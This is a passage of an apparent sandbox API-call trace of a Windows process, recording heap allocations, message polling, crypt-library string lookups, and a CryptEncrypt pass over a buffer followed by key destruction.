hHeap=0x770000, dwFlags=0x0, lpMem=0x88c820 | out: hHeap=0x770000) returned 1 [0029.821] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.821] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c820 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c778 [0029.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0029.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899a0 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbf8 [0029.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce68 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0029.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc28 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0029.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab530 [0029.822] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0029.822] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da338 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0029.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da218 [0029.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0029.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0029.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0029.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cce8 | out: hHeap=0x770000) returned 1 [0029.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb08 | out: hHeap=0x770000) returned 1 [0029.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cce8 [0029.823] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce38 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b19e0 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x14) returned 0x7ae948 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x44) returned 0x88e0e8 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0029.823] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0029.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da218 [0029.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da338 [0029.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb68 | out: hHeap=0x770000) returned 1 [0029.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da218 | out: hHeap=0x770000) returned 1 [0029.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a90 | out: hHeap=0x770000) returned 1 [0029.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da178 | out: hHeap=0x770000) returned 1 [0029.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88e0e8 | out: hHeap=0x770000) returned 1 [0029.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0029.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889730 | out: hHeap=0x770000) returned 1 [0029.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0029.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdf0 [0029.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889730 [0029.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a90 [0029.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7da1c8 [0029.824] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da1c8 [0029.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb68 [0029.824] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0029.824] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7da178 [0029.824] CryptGetKeyParam (in: hKey=0x7c2280, dwParam=0x7, pbData=0x7da328, pdwDataLen=0x6adcf0, dwFlags=0x0 | out: pbData=0x7da328*=0x660e, pdwDataLen=0x6adcf0*=0x4) returned 1 [0029.824] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.824] PeekMessageW (in: lpMsg=0x6ae324, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae324) returned 0 [0029.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.825] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0029.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1b70 | out: hHeap=0x770000) returned 1 [0029.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.825] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da318 | out: hHeap=0x770000) returned 1 [0029.825] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.825] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.825] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.825] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0029.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1a8 | out: hHeap=0x770000) returned 1 [0029.825] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.825] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cec8 | out: hHeap=0x770000) returned 1 [0029.825] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.825] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.825] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0029.826] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.826] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da358 | out: hHeap=0x770000) returned 1 [0029.826] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.826] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.826] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x6ae220*=0x6546, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x6ae220*=0x6550) returned 1 [0029.826] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.826] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.826] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0029.826] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.826] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.826] CharLowerBuffW (in: lpsz="byte[25937]", cchLength=0xb | out: lpsz="byte[25937]") returned 0xb [0029.826] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.827] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.827] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.827] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0029.827] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.827] CryptEncrypt (in: hKey=0x7c2280, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x8c2fb0*, pdwDataLen=0x6ae220*=0x6546, dwBufLen=0x6550 | out: pbData=0x8c2fb0*, pdwDataLen=0x6ae220*=0x6550) returned 1 [0029.827] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.827] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2340 | out: hHeap=0x770000) returned 1 [0029.827] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.827] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.827] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.827] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.827] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1be8 | out: hHeap=0x770000) returned 1 [0029.827] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.827] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.828] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da338 | out: hHeap=0x770000) returned 1 [0029.828] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.828] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0029.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cef8 | out: hHeap=0x770000) returned 1 [0029.828] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.828] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0029.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0029.828] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0029.828] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.828] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0029.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0029.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdc0 | out: hHeap=0x770000) returned 1 [0029.828] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0029.828] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.828] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.828] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2300 | out: hHeap=0x770000) returned 1 [0029.828] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.830] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.830] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0029.830] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0029.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0029.830] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.830] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0029.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1d8 | out: hHeap=0x770000) returned 1 [0029.830] PeekMessageW (in: lpMsg=0x6ae3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae3fc) returned 0 [0029.830] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0029.830] CryptDestroyKey (hKey=0x7c2280) returned 1 [0029.830] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.830] PeekMessageW (in: lpMsg=0x6aea4c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aea4c) returned 0 [0029.830] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0029.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19e0 | out: hHeap=0x770000) returned 1 [0029.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.830] PeekMessageW (in: lpMsg=0x6ae7f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae7f4) returned 0 [0029.830] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0029.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0029.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da258 | out: hHeap=0x770000) returned 1 [0029.830] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0029.830] PeekMessageW (in: lpMsg=0x6ae59c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae59c) returned 0 [0029.830] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0029.830] 